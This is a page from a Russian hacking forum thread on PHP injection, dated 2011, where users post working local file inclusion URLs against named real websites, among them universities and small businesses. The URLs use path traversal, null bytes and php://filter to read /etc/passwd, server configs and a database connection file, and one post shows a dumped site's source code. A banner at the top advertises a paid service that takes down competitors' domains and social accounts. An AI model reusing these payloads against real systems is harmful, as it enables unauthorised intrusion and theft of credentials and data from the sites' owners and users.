PHP Иньекции

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
PHP Иньекции

Страница 123 из 143

123

Опции темы

Поиск в этой теме

Опции просмотра

18.03.2011, 21:18

Lestatkiy

Познающий

Регистрация: 27.09.2010

Сообщений: 50

С нами: 8223446

Репутация: 5

http://www.dailymail.com/ap/ApWorld/201103181127?page=../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00

𝕏 Twitter Reddit Telegram Копировать ссылку

21.03.2011, 03:00

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

С нами: 8885780

Репутация: 672

http://www.matchplaytennis.com/index.php?page=php://filter/convert.base64-encode/resource=index

PHP код:


		
			
[COLOR="#000000"]
[COLOR="#0000BB"]';

    

    /*

        Check for the page variable.  If it is empty or

        uninitialized, set it value to the default or

        home page.

    */

    

[/COLOR][COLOR="#007700"]if ( isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]) || !empty([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]) )

    {

    

[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]];

        

            

    }else{

[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"home"[/COLOR][COLOR="#007700"];

    }

[/COLOR][COLOR="#0000BB"]$sanitycheck[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"http"[/COLOR][COLOR="#007700"]);

    

    

    

    if ([/COLOR][COLOR="#0000BB"]$sanitycheck[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#FF8000"]// Include the specified page.

        //include(realpath(basename($page)));

[/COLOR][COLOR="#007700"]include([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]".php"[/COLOR][COLOR="#007700"]);

    } 

    else {

        die([/COLOR][COLOR="#DD0000"]"Possible PHP Injection Attack"[/COLOR][COLOR="#007700"]);

    }    

    

[/COLOR][COLOR="#FF8000"]//echo "";

     // Diplay the footer

[/COLOR][COLOR="#007700"]require_once([/COLOR][COLOR="#DD0000"]"footer.php"[/COLOR][COLOR="#007700"]);

?

[/COLOR][/COLOR]

интересная протекция )

21.03.2011, 17:13

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

С нами: 8885780

Репутация: 672

читалюга

http://www.vintagetoys.com/help.php?template=../../../../../../home/twinkles/public_html/dbconnection.php%00

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR]

02.04.2011, 21:33

ta-kyn

Новичок

Регистрация: 07.05.2009

Сообщений: 20

С нами: 8953976

Репутация: 16

[IP 208.125.234.183]

Код:

http://web2.paulsmiths.edu/PAGE=../etc/passwd

18.04.2011, 10:38

LiRvD082

Новичок

Регистрация: 04.10.2009

Сообщений: 1

С нами: 8738719

Репутация: 0

http://www.letstalkwatch.com/shop/index.php?route=../../../../../../../etc/passwd%00

Пользуйтесь на здоровье!

23.04.2011, 23:43

eclipse

Участник форума

Регистрация: 19.12.2010

Сообщений: 155

С нами: 8103926

Репутация: 85

LFI :: kruta.ee :: PR - 3

Код:

_http://www.kruta.ee/main.php?lang=est&pg=../../../../../../data03/virt6224/domeenid/www.kruta.ee/htdocs/func

12.05.2011, 00:30

Expl0ited

Познавший АНТИЧАТ

Регистрация: 16.07.2010

Сообщений: 1,022

С нами: 8328566

Репутация: 935

Код:

http://people.clarkson.edu/~williaem/ew/home2.php?file=/etc/passwd

allow_url_include = on + никакой фильтрации

12.05.2011, 18:18

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

С нами: 9846041

Репутация: 1177

http://www.ub.edu/histeco/eng/membre.php?page=../../../../../etc/passwd

14.05.2011, 17:26

SHiNiGaMi

Познающий

Регистрация: 03.01.2010

Сообщений: 42

С нами: 8606717

Репутация: 3

http://jedit.org/index.php?page=/etc/passwd%00

#10

28.05.2011, 00:20

wkar

Познающий

Регистрация: 18.10.2009

Сообщений: 80

С нами: 8718197

Репутация: 11

http://www.skincarenet.org/news.php?include=../../../../../etc/passwd%00

Страница 123 из 143

123

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Books	PSalm69	Избранное	273	13.02.2016 01:24
Books PHP	FRAGNATIC	PHP	186	21.02.2010 02:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules